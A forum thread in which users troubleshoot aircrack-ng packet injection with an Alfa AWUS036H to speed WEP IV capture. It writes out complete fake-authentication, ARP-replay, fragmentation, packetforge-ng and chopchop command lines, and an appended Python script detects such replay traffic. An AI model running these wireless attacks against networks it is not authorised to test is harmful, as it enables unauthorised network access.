Thread: Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)

  1. #1
    verysofttoiletpaper (Just burned his ISO) | Join Date: Apr 2010 | Posts: 11

    Hello

    Just bought a new Alfa AWUS036H 1W version.

    I've successfully tried this method with other dongles and devices like rt73 chipsets and modified fonera, all worked fine.
    With the Alfa adaptor I'm not managing to increase the capture speed with aireplay packet injection.

    Already tried standard ARP-request replay (-3) and interactive frame selection (-2).
    I'm able to inject packets but the data on airodump-ng doesn't increase.

    Here is the list of commands I used:

    Monitor mode:
    airmon-ng start wlan0

    Start capture:
    airodump-ng mon0 -c (channel) --bssid (bssid) -w (file name)

    Fake authentication:
    aireplay-ng mon0 -1 0 -a (bssid)
    also tried: aireplay-ng mon0 -1 6000 -o 1 -p 10 -a (bssid)

    Injection:
    aireplay-ng mon0 -3 -b (bssid)
    also tried: aireplay-ng mon0 -2 -p 0841 -a (bssid)

    With both injection methods I was able to capture relevant packets and inject them, but with no increase in capture speed.

    Do you know how to solve this?

    Thank you in advance

    Here is some more info.

    Strange injection test

    Code:
    user@bt:~# aireplay-ng --test mon0 -B
    08:50:16  Trying broadcast probe requests...
    08:50:17  Injection is working!
    08:50:18  Found 9 APs
    
    08:50:18  Trying directed probe requests...
    08:50:18  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID1'
    08:50:18  Ping (min/avg/max): 2.680ms/7.753ms/20.206ms Power: -58.17
    08:50:18  30/30: 100%
    
    08:50:19  XX:XX:XX:XX:XX:XX - channel: 5 - 'ESSID2'
    08:50:19  Ping (min/avg/max): 4.422ms/12.744ms/34.941ms Power: -51.07
    08:50:19  30/30: 100%
    
    08:50:19  XX:XX:XX:XX:XX:XX - channel: 4 - 'ESSID3'
    08:50:20  Ping (min/avg/max): 2.356ms/16.275ms/30.673ms Power: -68.52
    08:50:20  27/30:  90%
    
    08:50:20  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID4'
    08:50:22  Ping (min/avg/max): 2.551ms/56.281ms/90.835ms Power: -62.33
    08:50:22  30/30: 100%
    
    08:50:22  XX:XX:XX:XX:XX:XX - channel: 3 - 'ESSID5'
    08:50:24  Ping (min/avg/max): 2.789ms/50.461ms/124.735ms Power: -61.83
    08:50:24  30/30: 100%
    
    08:50:24  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID6'
    08:50:25  Ping (min/avg/max): 2.375ms/30.914ms/48.711ms Power: -62.03
    08:50:25  30/30: 100%
    
    08:50:25  XX:XX:XX:XX:XX:XX - channel: 1 - 'ESSID7'
    08:50:26  Ping (min/avg/max): 11.234ms/29.659ms/54.035ms Power: -46.30
    08:50:26  30/30: 100%
    
    08:50:26  XX:XX:XX:XX:XX:XX - channel: 1 - 'ESSID8'
    08:50:27  Ping (min/avg/max): 2.579ms/21.330ms/38.686ms Power: -57.68
    08:50:27  28/30:  93%
    
    08:50:27  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID9'
    08:50:28  Ping (min/avg/max): 3.037ms/13.490ms/27.155ms Power: -68.62
    08:50:28  29/30:  96%
    
    08:50:28  Trying directed probe requests for all bitrates...
    
    08:50:28  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID1'
    08:50:28  Probing at 1.0 Mbps:  28/30:  93%
    08:50:29  Probing at 2.0 Mbps:  30/30: 100%
    08:50:30  Probing at 5.5 Mbps:  29/30:  96%
    08:50:31  Probing at 6.0 Mbps:  27/30:  90%
    08:50:31  Probing at 9.0 Mbps:  30/30: 100%
    08:50:32  Probing at 11.0 Mbps: 29/30:  96%
    08:50:33  Probing at 12.0 Mbps: 30/30: 100%
    08:50:34  Probing at 18.0 Mbps: 29/30:  96%
    08:50:34  Probing at 24.0 Mbps: 27/30:  90%
    08:50:35  Probing at 36.0 Mbps: 29/30:  96%
    08:50:36  Probing at 48.0 Mbps: 29/30:  96%
    08:50:37  Probing at 54.0 Mbps: 29/30:  96%
    
    08:50:37  XX:XX:XX:XX:XX:XX - channel: 5 - 'ESSID2'
    08:50:39  Probing at 1.0 Mbps:  10/30:  33%
    08:50:41  Probing at 2.0 Mbps:   9/30:  30%
    08:50:43  Probing at 5.5 Mbps:   9/30:  30%
    08:50:45  Probing at 6.0 Mbps:  10/30:  33%
    08:50:47  Probing at 9.0 Mbps:  11/30:  36%
    08:50:49  Probing at 11.0 Mbps:  9/30:  30%
    08:50:51  Probing at 12.0 Mbps: 13/30:  43%
    08:50:53  Probing at 18.0 Mbps: 10/30:  33%
    08:50:55  Probing at 24.0 Mbps: 13/30:  43%
    08:50:57  Probing at 36.0 Mbps: 10/30:  33%
    08:50:59  Probing at 48.0 Mbps: 10/30:  33%
    08:51:01  Probing at 54.0 Mbps:  9/30:  30%
    
    08:51:01 XX:XX:XX:XX:XX:XX - channel: 4 - 'ESSID3'
    08:51:04  Probing at 1.0 Mbps:   0/30:   0%
    08:51:07  Probing at 2.0 Mbps:   0/30:   0%
    08:51:10  Probing at 5.5 Mbps:   0/30:   0%
    08:51:13  Probing at 6.0 Mbps:   0/30:   0%
    08:51:16  Probing at 9.0 Mbps:   0/30:   0%
    08:51:19  Probing at 11.0 Mbps:  0/30:   0%
    08:51:22  Probing at 12.0 Mbps:  0/30:   0%
    08:51:25  Probing at 18.0 Mbps:  0/30:   0%
    08:51:28  Probing at 24.0 Mbps:  0/30:   0%
    08:51:31  Probing at 36.0 Mbps:  0/30:   0%
    08:51:34  Probing at 48.0 Mbps:  0/30:   0%
    08:51:37  Probing at 54.0 Mbps:  0/30:   0%
    
    08:51:37  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID4'
    08:51:38  Probing at 1.0 Mbps:  26/30:  86%
    08:51:40  Probing at 2.0 Mbps:  26/30:  86%
    08:51:41  Probing at 5.5 Mbps:  25/30:  83%
    08:51:42  Probing at 6.0 Mbps:  28/30:  93%
    08:51:44  Probing at 9.0 Mbps:  27/30:  90%
    08:51:45  Probing at 11.0 Mbps: 25/30:  83%
    08:51:46  Probing at 12.0 Mbps: 27/30:  90%
    08:51:48  Probing at 18.0 Mbps: 25/30:  83%
    08:51:49  Probing at 24.0 Mbps: 25/30:  83%
    08:51:51  Probing at 36.0 Mbps: 26/30:  86%
    08:51:52  Probing at 48.0 Mbps: 24/30:  80%
    08:51:53  Probing at 54.0 Mbps: 27/30:  90%
    
    08:51:53  XX:XX:XX:XX:XX:XX - channel: 3 - 'ESSID5'
    08:51:56  Probing at 1.0 Mbps:   0/30:   0%
    08:51:59  Probing at 2.0 Mbps:   0/30:   0%
    08:52:02  Probing at 5.5 Mbps:   0/30:   0%
    08:52:05  Probing at 6.0 Mbps:   0/30:   0%
    08:52:08  Probing at 9.0 Mbps:   0/30:   0%
    08:52:11  Probing at 11.0 Mbps:  0/30:   0%
    08:52:14  Probing at 12.0 Mbps:  0/30:   0%
    08:52:17  Probing at 18.0 Mbps:  0/30:   0%
    08:52:20  Probing at 24.0 Mbps:  0/30:   0%
    08:52:23  Probing at 36.0 Mbps:  0/30:   0%
    08:52:26  Probing at 48.0 Mbps:  0/30:   0%
    08:52:29  Probing at 54.0 Mbps:  0/30:   0%
    
    08:52:29  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID6'
    08:52:30  Probing at 1.0 Mbps:  29/30:  96%
    08:52:30  Probing at 2.0 Mbps:  30/30: 100%
    08:52:31  Probing at 5.5 Mbps:  29/30:  96%
    08:52:31  Probing at 6.0 Mbps:  30/30: 100%
    08:52:32  Probing at 9.0 Mbps:  28/30:  93%
    08:52:32  Probing at 11.0 Mbps: 27/30:  90%
    08:52:33  Probing at 12.0 Mbps: 29/30:  96%
    08:52:33  Probing at 18.0 Mbps: 30/30: 100%
    08:52:34  Probing at 24.0 Mbps: 27/30:  90%
    08:52:34  Probing at 36.0 Mbps: 29/30:  96%
    08:52:35  Probing at 48.0 Mbps: 29/30:  96%
    08:52:35  Probing at 54.0 Mbps: 30/30: 100%
    
    08:52:35  XX:XX:XX:XX:XX:XX - channel: 1 - 'ESSID7'
    08:52:38  Probing at 1.0 Mbps:   0/30:   0%
    08:52:41  Probing at 2.0 Mbps:   0/30:   0%
    08:52:44  Probing at 5.5 Mbps:   0/30:   0%
    08:52:47  Probing at 6.0 Mbps:   0/30:   0%
    08:52:50  Probing at 9.0 Mbps:   0/30:   0%
    08:52:53  Probing at 11.0 Mbps:  0/30:   0%
    08:52:56  Probing at 12.0 Mbps:  0/30:   0%
    08:52:59  Probing at 18.0 Mbps:  0/30:   0%
    08:53:02  Probing at 24.0 Mbps:  0/30:   0%
    08:53:05  Probing at 36.0 Mbps:  0/30:   0%
    08:53:08  Probing at 48.0 Mbps:  0/30:   0%
    08:53:11  Probing at 54.0 Mbps:  0/30:   0%
    
    08:53:11  XX:XX:XX:XX:XX:XX - channel: 1 - 'ESSID8'
    08:53:14  Probing at 1.0 Mbps:   0/30:   0%
    08:53:17  Probing at 2.0 Mbps:   0/30:   0%
    08:53:20  Probing at 5.5 Mbps:   0/30:   0%
    08:53:23  Probing at 6.0 Mbps:   0/30:   0%
    08:53:26  Probing at 9.0 Mbps:   0/30:   0%
    08:53:29  Probing at 11.0 Mbps:  0/30:   0%
    08:53:32  Probing at 12.0 Mbps:  0/30:   0%
    08:53:35  Probing at 18.0 Mbps:  0/30:   0%
    08:53:38  Probing at 24.0 Mbps:  0/30:   0%
    08:53:41  Probing at 36.0 Mbps:  0/30:   0%
    08:53:44  Probing at 48.0 Mbps:  0/30:   0%
    08:53:47  Probing at 54.0 Mbps:  0/30:   0%
    
    08:53:47  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID9'
    08:53:48  Probing at 1.0 Mbps:  24/30:  80%
    08:53:49  Probing at 2.0 Mbps:  22/30:  73%
    08:53:50  Probing at 5.5 Mbps:  24/30:  80%
    08:53:51  Probing at 6.0 Mbps:  22/30:  73%
    08:53:52  Probing at 9.0 Mbps:  24/30:  80%
    08:53:53  Probing at 11.0 Mbps: 22/30:  73%
    08:53:53  Probing at 12.0 Mbps: 25/30:  83%
    08:53:54  Probing at 18.0 Mbps: 22/30:  73%
    08:53:55  Probing at 24.0 Mbps: 22/30:  73%
    08:53:56  Probing at 36.0 Mbps: 26/30:  86%
    08:53:57  Probing at 48.0 Mbps: 25/30:  83%
    08:53:58  Probing at 54.0 Mbps: 23/30:  76%
    Thank you
    Last edited by Archangel-Amael; 04-12-2010 at 01:48 PM.

  2. #2
    hypervista (Senior Member) | Join Date: Feb 2010 | Posts: 121

    vstp - given the commands you listed, I'm shocked that you were able to get it to work on other dongles; your command arguments are incomplete. For example, your Fake Authentication and ARP replay attacks are both missing the -h <interface MAC> argument and your Fake Authentication attack is also missing the -e <target AP ESSID>. Google aircrack-ng and study the various commands and their associated argument list.

    Also, don't forget to start your adapter in monitor mode on the target AP channel.

  3. #3
    verysofttoiletpaper (Just burned his ISO) | Join Date: Apr 2010 | Posts: 11

    @hypervista: Depending on the version of aircrack-ng, the -h argument is required or not.
    In the version included with BackTrack 4, if we don't provide a source MAC address (-h) it will automatically use the address of our board, in this case the address we want to use, since it's a clientless attack and we are performing a fake authentication attack.

    In the fake authentication, the ESSID is also not required. You can use just the BSSID, just the ESSID, or both.

    Now, just to clear out the doubts, I will try to put the card in monitor mode in a specific channel instead of using airmon-ng.

    I will also use the arguments in fault but I have strong convictions that the problem is not there.

    More suggestions are welcome

  4. #4
    verysofttoiletpaper (Just burned his ISO) | Join Date: Apr 2010 | Posts: 11

    It is working now. I could not identify what the problem is, but I suspect that it is something related to the fake authentication.

    Starting monitor mode on a specific channel with airmon-ng start wlan0 6 didn't have actual results.

    When I did an airodump it hopped through all channels like usual.

    Thank you anyway

  5. #5
    hypervista (Senior Member) | Join Date: Feb 2010 | Posts: 121

    vstp - I stand corrected. I vaguely recalled omitting the -h argument and getting an error message, what I didn't recall was it continuing, as you said, assuming the card's MAC.

    Have you tried the Fragmentation attack?

    Code:
    aireplay-ng -5 -b <AP MAC> -h <iface MAC (optional :D)> <iface>

    The key stream will be captured to a .xor file, which will be used to conduct packet forging

    Code:
    packetforge-ng -0 -a <AP MAC> -h <iface MAC> -k 255.255.255.255 -l 255.255.255.255 -y <filename .xor from previous step> -w <arp-rqst>

    Then inject forged packet

    Code:
    aireplay-ng -2 -r <arp-rqst> <iface>

    That should speed up IV collection.

  6. #6
    verysofttoiletpaper (Just burned his ISO) | Join Date: Apr 2010 | Posts: 11

    Yes, I tried the fragmentation without success. I was not able to generate a valid keystream.

    However, the chopchop attack (-4) worked well, although slow. I was able to generate an ARP request packet and inject it at about 250pps.

    The standard arp replay was faster at about 450pps.

    Thank you for your responses

  7. #7
    shamanvirtuel (Senior Member) | Join Date: Mar 2010 | Location: Somewhere in the "Ex" human right country | Posts: 2,988

    in any case, your p0841 attack is false

    aireplay-ng -2 -F -p0841 -m 68 -n 86 -b APMAC -h CLIMAC -c FF:FF:FF:FF:FF:FF mon0

    ++
    SV

  8. #8
    verysofttoiletpaper (Just burned his ISO) | Join Date: Apr 2010 | Posts: 11

    Yeah, I also tried that. The clientless attack is fast to begin because it uses any packet to inject.

    However the injection rate was very slow, about 50pps
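
Added example (not part of the thread or of aircrack-ng): seen from the monitoring side, the replay attacks discussed here leave a recognisable pattern, one transmitter sending tens to hundreds of broadcast-addressed protected frames per second inside the 68 to 86 byte window named in the thread, all reusing a single WEP IV. The Python below flags that pattern in constructed frame records; the record layout, the thresholds and the MAC addresses are assumptions.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"
ARP_SIZES = range(68, 87)   # length window from the thread's "-m 68 -n 86" filter
PPS_THRESHOLD = 40          # assumption: just under the slowest rate reported (50 pps)
MIN_DUP_RATIO = 0.9         # assumption: share of frames reusing an already-seen IV


def detect_arp_replay(frames, pps_threshold=PPS_THRESHOLD):
    """frames: (ts_seconds, transmitter, dest, length, wep_iv_hex, protected) tuples.
    Returns sorted (second, transmitter, frame_count) windows that look like replay."""
    buckets = defaultdict(list)
    for ts, src, dst, length, iv, protected in frames:
        if protected and dst.lower() == BROADCAST and length in ARP_SIZES:
            buckets[(int(ts), src.lower())].append(iv)
    alerts = []
    for (second, src), ivs in buckets.items():
        count = len(ivs)
        if count < pps_threshold:
            continue
        # A replayed frame is resent unchanged, so its WEP IV repeats; a busy
        # legitimate station uses a fresh IV for nearly every frame.
        dup_ratio = 1 - len(set(ivs)) / count
        if dup_ratio >= MIN_DUP_RATIO:
            alerts.append((second, src, count))
    return sorted(alerts)


def sample_capture(replay_pps=450):
    """Constructed frame records (not a real capture); MACs are placeholders."""
    client, replayer = "02:00:00:00:00:01", "02:00:00:00:00:02"
    frames = [(100.0 + i * 0.3, client, BROADCAST, 68, f"{i:06x}", True)
              for i in range(3)]                       # normal ARP chatter
    frames += [(101.0 + i / replay_pps, replayer, BROADCAST, 68, "a1b2c3", True)
               for i in range(replay_pps)]             # one frame resent, same IV
    frames += [(102.0 + i / 60, client, BROADCAST, 86, f"{i + 256:06x}", True)
               for i in range(60)]                     # busy but fresh IVs
    return frames


if __name__ == "__main__":
    for second, src, count in detect_arp_replay(sample_capture()):
        print(f"t={second}s {src} sent {count} same-IV broadcast frames")
```

The IV check is what separates replay from a station that is merely busy: the 60 fresh-IV frames in the sample exceed the rate threshold but are not flagged.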
